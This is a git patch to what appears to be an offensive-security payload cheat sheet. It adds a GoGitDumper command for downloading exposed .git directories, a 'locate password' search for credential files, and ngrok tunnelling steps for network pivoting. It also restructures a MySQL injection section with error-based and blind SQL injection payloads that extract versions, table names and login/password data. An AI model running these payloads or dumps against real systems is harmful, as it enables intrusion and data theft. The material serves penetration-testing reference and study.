From 13864bde04577962cb9a312fe6e34534d076af56 Mon Sep 17 00:00:00 2001
From: Swissky
Date: Mon, 15 Apr 2019 00:49:56 +0200
Subject: [PATCH] GoGitDumper + MySQL summary rewrite

---
 Insecure Source Code Management/README.md | 10 ++++
 .../Linux - Privilege Escalation.md | 13 +++++
 .../Network Pivoting Techniques.md | 16 +++++++
 SQL Injection/MySQL Injection.md | 47 +++++++++++++------
 4 files changed, 71 insertions(+), 15 deletions(-)

diff --git a/Insecure Source Code Management/README.md b/Insecure Source Code Management/README.md
index 40fed0b..bef0805 100644
--- a/Insecure Source Code Management/README.md
+++ b/Insecure Source Code Management/README.md
@@ -3,6 +3,7 @@
 - [GIT - Source code management](#git---source-code-management)
 - [Github example with a .git](#github-example-with-a-git)
 - [Automatic way : diggit.py](#automatic-way--diggitpy)
+ - [Automatic way : GoGitDumper](#automatic-way-gogitdumper)
 - [Automatic way : rip-git](#automatic-way--rip-git)
 - [Automatic way : GitHack](#automatic-way--githack)
 - [Harvesting secrets : trufflehog](#harvesting-secrets--trufflehog)
@@ -108,6 +109,15 @@ sha1 = d7ef4d77741c38b6d3806e0c6a57bf1090eec141
 -o is a hash of particular Git object to download
 ```
 
+### Automatic way : GoGitDumper
+
+```powershell
+go get github.com/c-sto/gogitdumper
+gogitdumper -u http://urlhere.com/.git/ -o yourdecideddir/.git/
+git log
+git checkout
+```
+
 ### Automatic way : rip-git
 
 ```powershell
diff --git a/Methodology and Resources/Linux - Privilege Escalation.md b/Methodology and Resources/Linux - Privilege Escalation.md
index 9242f04..828e58e 100644
--- a/Methodology and Resources/Linux - Privilege Escalation.md
+++ b/Methodology and Resources/Linux - Privilege Escalation.md
@@ -17,6 +17,7 @@
 * [Files containing passwords](#files-containing-passwords)
 * [Last edited files](#last-edited-files)
 * [In memory passwords](#in-memory-passwords)
+ * [Find sensitive files](#find-sensitive-files)
 * [Scheduled tasks](#scheduled-tasks)
 * [Cron jobs](#cron-jobs)
 * [Systemd timers](#systemd-timers)
@@ -139,6 +140,18 @@ find / -mmin -10 2>/dev/null | grep -Ev "^/proc"
 strings /dev/mem -n10 | grep -i PASS
 ```
 
+### Find sensitive files
+
+```powershell
+$ locate password | more
+/boot/grub/i386-pc/password.mod
+/etc/pam.d/common-password
+/etc/pam.d/gdm-password
+/etc/pam.d/gdm-password.original
+/lib/live/config/0031-root-password
+...
+```
+
 ## Scheduled tasks
 
 ### Cron jobs
diff --git a/Methodology and Resources/Network Pivoting Techniques.md b/Methodology and Resources/Network Pivoting Techniques.md
index e69f7c0..227d80a 100644
--- a/Methodology and Resources/Network Pivoting Techniques.md
+++ b/Methodology and Resources/Network Pivoting Techniques.md
@@ -130,6 +130,22 @@ plink -l root -pw mypassword 192.168.18.84 -R
 plink -R [Port to forward to on your VPS]:localhost:[Port to forward on your local machine] [VPS IP]
 ```
 
+## ngrok
+
+```powershell
+# get the binary
+wget https://bin.equinox.io/c/4VmDzA7iaHb/ngrok-stable-linux-amd64.zip
+unzip ngrok-stable-linux-amd64.zip
+
+# log into the service
+./ngrok authtoken 3U[REDACTED_TOKEN]Hm
+
+# deploy a port forwarding for 4433
+./ngrok http 4433
+./ngrok tcp 4433
+```
+
+
 ## Basic Pivoting Types
 
 | Type | Use Case |
diff --git a/SQL Injection/MySQL Injection.md b/SQL Injection/MySQL Injection.md
index 3677441..cbae419 100644
--- a/SQL Injection/MySQL Injection.md
+++ b/SQL Injection/MySQL Injection.md
@@ -8,13 +8,15 @@
 * [Extract database with information_schema](#extract-database-with-information-schema)
 * [Extract data without information_schema](#extract-data-without-information-schema)
 * [Extract data without columns name](#extract-data-without-columns-name)
-* [MYSQL Error Based - Basic](#mysql-error-based---basic)
-* [MYSQL Error Based - UpdateXML function](#mysql-error-based---updatexml-function)
-* [MYSQL Error Based - Extractvalue function](#mysql-error-based---extractvalue-function)
-* [MYSQL Blind with substring equivalent](#mysql-blind-with-substring-equivalent)
-* [MYSQL Blind using a conditional statement](#mysql-blind-using-a-conditional-statement)
-* [MYSQL Blind with MAKE_SET](#mysql-blind-with-make-set)
-* [MYSQL Blind with LIKE](#mysql-blind-with-like)
+* [MYSQL Error Based](#mysql-error-based)
+ * [MYSQL Error Based - Basic](#mysql-error-based---basic)
+ * [MYSQL Error Based - UpdateXML function](#mysql-error-based---updatexml-function)
+ * [MYSQL Error Based - Extractvalue function](#mysql-error-based---extractvalue-function)
+* [MYSQL Blind](#mysql-blind)
+ * [MYSQL Blind with substring equivalent](#mysql-blind-with-substring-equivalent)
+ * [MYSQL Blind using a conditional statement](#mysql-blind-using-a-conditional-statement)
+ * [MYSQL Blind with MAKE_SET](#mysql-blind-with-make-set)
+ * [MYSQL Blind with LIKE](#mysql-blind-with-like)
 * [MYSQL Time Based](#mysql-time-based)
 * [MYSQL DIOS - Dump in One Shot](#mysql-dios---dump-in-one-shot)
 * [MYSQL Read content of a file](#mysql-read-content-of-a-file)
@@ -108,7 +110,12 @@ MariaDB [dummydb]> select author_id,title from posts where author_id=-1 union se
 ```
 
 
-## MYSQL Error Based - Basic
+
+
+
+## MYSQL Error Based
+
+### MYSQL Error Based - Basic
 
 Works with `MySQL >= 4.1`
 
@@ -117,7 +124,7 @@ Works with `MySQL >= 4.1`
 '+(select 1 and row(1,1)>(select count(*),concat(CONCAT(@@VERSION),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'
 ```
 
-## MYSQL Error Based - UpdateXML function
+### MYSQL Error Based - UpdateXML function
 
 ```sql
 AND updatexml(rand(),concat(CHAR(126),version(),CHAR(126)),null)-
@@ -134,7 +141,7 @@ Shorter to read:
 ' and updatexml(null,concat(0x0a,(select table_name from information_schema.tables where table_schema=database() LIMIT 0,1)),null)-- -
 ```
 
-## MYSQL Error Based - Extractvalue function
+### MYSQL Error Based - Extractvalue function
 
 Works with `MySQL >= 5.1`
 
@@ -146,7 +153,9 @@ AND extractvalue(rand(),concat(0x3a,(SELECT concat(CHAR(126),column_name,CHAR(12
 AND extractvalue(rand(),concat(0x3a,(SELECT concat(CHAR(126),data_info,CHAR(126)) FROM data_table.data_column LIMIT data_offset,1)))--
 ```
 
-## MYSQL Blind with substring equivalent
+## MYSQL Blind
+
+### MYSQL Blind with substring equivalent
 
 ```sql
 ?id=1 and substring(version(),1,1)=5
@@ -156,7 +165,7 @@ AND extractvalue(rand(),concat(0x3a,(SELECT concat(CHAR(126),data_info,CHAR(126)
 ?id=1 and (select mid(version(),1,1)=4)
 ```
 
-## MYSQL Blind using a conditional statement
+### MYSQL Blind using a conditional statement
 
 TRUE: `if @@version starts with a 5`:
 
@@ -174,7 +183,7 @@ Response: HTTP/1.1 200 OK
 ```
 
 
-## MYSQL Blind with MAKE_SET
+### MYSQL Blind with MAKE_SET
 
 ```sql
 AND MAKE_SET(YOLO<(SELECT(length(version()))),1)
@@ -183,7 +192,7 @@ AND MAKE_SET(YOLO<(SELECT(length(concat(login,password)))),1)
 AND MAKE_SET(YOLO